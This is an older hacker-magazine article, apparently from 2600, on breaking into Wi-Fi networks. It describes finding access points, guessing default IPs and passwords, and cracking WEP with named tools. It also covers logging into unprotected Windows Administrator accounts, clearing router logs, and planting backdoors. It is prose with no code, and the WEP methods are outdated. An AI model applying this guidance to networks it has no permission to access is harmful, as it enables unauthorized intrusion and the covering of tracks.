More Fun With Wireless Hacking

by VileSYN

As the prices go down, wireless becomes more and more common.  While many people ignore the vulnerabilities that Wi-Fi holds, it's an easy way for anyone to enter the network.  Even setting WEP keys will not keep a determined hacker from compromising the Wi-Fi Access Point (AP) or router.

Many tools are available for various operating systems to do such tasks.  NetStumbler for Windows, MacStumbler for MacOS, Wellenreiter for UNIX, and BSD-Airtools for Free/Open/NetBSD are Wi-Fi network stumblers to help find APs.

Most of these applications can use a GPS to map the access points detected while scanning.  Such stumbling tools are what makes wireless hacking such a threat.  Using these tools is quite simple and straight to the point.  Each will detect the APs from stray signals, detect WEP transmissions, channel, signal strength, and MAC address.  While they also determine the manufacture by the MAC address, some entries can be incorrectly identified.

A way of finding the exact manufacturer by MAC address can be seen on the page standards-oui.ieee.org/oui/oui.txt.  Every MAC address and manufacture is listed.  This brings us to another key to entering the network.  Sometimes you can enter the network easily by using DHCP, but not all networks have DHCP available.  In such a case, there are a few ways to obtain the address of the AP.

The first way to acquire the IP is to use the default IP that the wireless device is set to.  For instance, D-Link routers use 192.168.0.1, and their access points use 192.168.0.50.  On the other hand, Linksys uses 192.168.1.1 and Netgear uses 192.168.0.1.  If the default IP is not the IP of the AP, then you can use a sniffing utility to capture packets coming from Wi-Fi signal.

Once you have gained the IP and enabled an associated connection to the AP, it's time to connect elsewhere.  Even though you might have a connection, WEP might be holding you back.  WEP is an encryption used for wireless networking stated in the IEEE standard for 802.11A/B.  When they made this standard, they did not think of what could be done to crack it.  Every minute, a small amount of WEP broadcasts are sent over the network.  Each broadcast frame is the same.  Allowing these frames to be captured easily and decrypting without worrying about the packets changing.

With WEP tools like WEPCrack, Airsnort, and BSD-Airtools' dweputils, cracking a WEP dump can be accomplished within a few minutes.

Some 104-bit (128-bit) keys can take up to 36 hours depending on the speed of your system, but logging your hits or using a GPS can show you where that network was when you first found it so that you can go back after breaking the key.

Once this is all done, the network is under your control.  From here you don't have to worry about the router blocking your system from anything and sometimes receiving an SNMP log or two.  If you know the default password for the specific AP, you can always go for that first.  If you do not know the defaults for Wi-Fi devices, go to the manufacturer site and look up models to find the documents with the defaults.

Another way is to use a terminal service like Remote Desktop for Windows or rdesktop for Linux/UNIX to connect to a Windows desktop.  (Remember, most people do not set a password for the Admin or Administrator account in Windows.)  From there you can use the local browser and see if any cookies were used in the past to log into the AP.

Remember, even though you're taking a backdoor into the network, logs can still show your existence.  Clearing router logs or entering the network with a "man-in-the-middle" (MITM) attack or spoofed MAC will look like normal activity on the network.  Providing a backdoor from the router and placing a route to a service on another system to get in can do a vast amount of good for your final compromise.

These particular methods are slowly becoming obsolete.  Wi-Fi Protected Access (WPA) provides better authentication and stops the repeating frame encryption packets.  Many wireless devices are now starting to have the option of disabling signal broadcasting and disallowing signals to be "stumbled" upon.

Even though this new technology is being offered, it doesn't mean the weak link in any network is becoming smarter or that people are even upgrading.  Rather, if you plan to secure your Wi-Fi network or conquer another, signals will always be monitored.

Thanx to: The error between the chair and the computer, FBSDHN, SE, and all those other people.

Return to $2600 Index